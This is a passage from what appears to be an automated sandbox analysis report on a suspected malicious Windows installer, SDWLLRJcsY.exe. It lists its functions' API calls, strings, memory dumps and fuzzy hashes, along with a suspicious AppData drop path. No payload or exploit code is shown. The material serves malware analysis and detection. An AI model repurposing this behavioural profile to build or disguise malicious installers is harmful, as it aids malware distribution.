                                      • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                      • GlobalFree.KERNEL32(?), ref: 0040505C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                      • ShowWindow.USER32(?,00000000), ref: 004051FB
                                      • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                      • ShowWindow.USER32(00000000), ref: 0040520D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                      • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                      • Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                      • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                      Function 004046B0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 004046FF
                                      • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                      • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                      • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                      • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404817
                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404823
                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                                        • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                        • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                      • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                        • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                        • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                        • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: : Completed$A$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$6B
                                      • API String ID: 2624150263-1256906607
                                      • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                      • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                      • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                      • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                      Function 0040437E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                      • GetSysColor.USER32(?), ref: 0040445E
                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                      • lstrlenW.KERNEL32(?), ref: 0040447F
                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                      • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                      • SendMessageW.USER32(00000000), ref: 00404501
                                      • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                      • SetCursor.USER32(00000000), ref: 00404580
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                      • SetCursor.USER32(00000000), ref: 0040459C
                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                      • String ID: : Completed$N
                                      • API String ID: 3103080414-2140067464
                                      • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                      • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                      • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                      • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                      • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                      • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                      • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                      Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                      • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                                        • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                        • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                      • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
                                      • wsprintfA.USER32 ref: 00405F17
                                      • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                      • GlobalFree.KERNEL32(00000000), ref: 00406000
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                        • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                        • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                      • String ID: %ls=%ls$[Rename]
                                      • API String ID: 2171350718-461813615
                                      • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                      • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                      • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                      • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                      Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-1569600145
                                      • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                      • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                      • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                      • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                      Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                      • GetSysColor.USER32(00000000), ref: 00404281
                                      • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                      • SetBkMode.GDI32(?,?), ref: 00404299
                                      • GetSysColor.USER32(?), ref: 004042AC
                                      • SetBkColor.GDI32(?,?), ref: 004042BC
                                      • DeleteObject.GDI32(?), ref: 004042D6
                                      • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                      • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                      • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                      Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                        • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                      • String ID: 9
                                      • API String ID: 163830602-2366072709
                                      • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                      • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                      • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                      • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                      Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                      • GetMessagePos.USER32 ref: 00404B9D
                                      • ScreenToClient.USER32(?,?), ref: 00404BB7
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
